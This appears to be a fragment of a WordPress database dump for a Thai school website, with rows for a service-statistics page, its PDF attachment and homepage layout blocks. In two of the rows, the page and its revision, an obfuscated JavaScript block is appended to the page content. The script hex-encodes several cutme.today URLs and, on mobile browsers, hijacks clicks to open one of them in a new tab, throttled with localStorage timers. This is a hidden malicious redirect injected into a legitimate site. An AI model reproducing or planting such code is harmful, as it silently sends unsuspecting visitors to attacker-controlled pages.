_0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลเชิงสถิติการให้บริการ','','publish','closed','closed','','%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%87%e0%b8%aa%e0%b8%96%e0%b8%b4%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%83%e0%b8%ab%e0%b9%89%e0%b8%9a','','','2024-08-09 11:55:06','2024-08-09 04:55:06','',0,'http://pakhaeng.ssk.in.th/?page_id=776',0,'page','',0),
(777,1,'2024-08-09 11:55:01','2024-08-09 04:55:01','','012สถิติการให้บริการ','','inherit','','closed','','012%e0%b8%aa%e0%b8%96%e0%b8%b4%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%83%e0%b8%ab%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3','','','2024-08-09 11:55:01','2024-08-09 04:55:01','',776,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/012สถิติการให้บริการ.pdf',0,'attachment','application/pdf',0),
(778,1,'2024-08-09 11:55:06','2024-08-09 04:55:06','<!-- wp:file {\"id\":777,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/012สถิติการให้บริการ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/012สถิติการให้บริการ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"012สถิติการให้บริการ\"></object><a id=\"wp-block-file--media-3b89fb91-add8-4366-be8e-8b0998e80260\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/012สถิติการให้บริการ.pdf\">012สถิติการให้บริการ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/012สถิติการให้บริการ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-3b89fb91-add8-4366-be8e-8b0998e80260\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลเชิงสถิติการให้บริการ','','inherit','closed','closed','','776-revision-v1','','','2024-08-09 11:55:06','2024-08-09 04:55:06','',776,'http://pakhaeng.ssk.in.th/?p=778',0,'revision','',0),
(779,1,'2024-08-09 11:55:20','2024-08-09 04:55:20','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 